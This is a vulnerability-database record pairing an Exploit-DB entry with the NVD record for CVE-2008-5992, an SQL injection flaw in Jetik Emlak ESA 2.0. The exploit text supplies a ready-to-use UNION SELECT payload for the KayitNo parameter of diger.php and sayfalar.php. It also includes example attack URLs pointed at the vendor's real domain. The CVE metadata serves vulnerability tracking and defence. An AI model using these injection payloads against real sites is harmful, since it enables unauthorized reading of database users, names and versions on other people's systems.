{"id": "EDB-ID:6549", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Jetik Emlak ESA 2.0 - Multiple Remote SQL Injection Vulnerabilities", "description": "Jetik Emlak ESA 2.0 Multiple Remote SQL Injection Vulnerabilities. CVE-2008-5992. Webapps exploit for php platform", "published": "2008-09-24T00:00:00", "modified": "2008-09-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/6549/", "reporter": "ZoRLu", "references": [], "cvelist": ["CVE-2008-5992"], "lastseen": "2016-02-01T00:06:02", "viewCount": 9, "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2016-02-01T00:06:02", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5992"]}], "modified": "2016-02-01T00:06:02", "rev": 2}, "vulnersScore": 7.7}, "sourceHref": "https://www.exploit-db.com/download/6549/", "sourceData": "[~] Jetik Emlak ESA 2.0 System Script\n[~]\n[~] (KayitNo) multiple remote sql inj\n[~]\n[~] ----------------------------------------------------------\n[~] Discovered By: ZoRLu\n[~]\n[~] Date: 24.09.2008\n[~]\n[~] contact: trt-turk@hotmail.com\n[~]\n[~] contact: zorlu@w.cn\n[~] \n[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (\n[~]\n[~] -----------------------------------------------------------\n\nExploit:\n\nhttp://localhost/script_path/diger.php?KayitNo=[SQL]\n\nhttp://localhost/script_path/sayfalar.php?KayitNo=[SQL]\n\n[SQL]= \n\n-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*\n\nExample:\n\nhttp://www.jetik.net/esa/diger.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*\n\nExample 2:\n\nhttp://www.jetik.net/esa/sayfalar.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*\n\n\n\n\n[~]----------------------------------------------------------------------\n[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs\n[~]\n[~] http://www.z0rlu.blogspot.com online : )\n[~]\n[~] home: yildirimordulari.org & r00tsecurity.org & darkc0de.com\n[~]\n[~]----------------------------------------------------------------------\n\n# milw0rm.com [2008-09-24]\n", "osvdbidlist": ["48553", "48554", "51676", "51677"]}

{"cve": [{"lastseen": "2020-10-03T11:51:04", "description": "Multiple SQL injection vulnerabilities in Jetik Emlak Sistem A (ESA) 2.0 allow remote attackers to execute arbitrary SQL commands via the KayitNo parameter to (1) diger.php and (2) sayfalar.php.", "edition": 3, "cvss3": {}, "published": "2009-01-28T15:30:00", "title": "CVE-2008-5992", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5992"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:jetik:jetik_emlak_sistem_a:2.0"], "id": "CVE-2008-5992", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5992", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:jetik:jetik_emlak_sistem_a:2.0:*:*:*:*:*:*:*"]}]}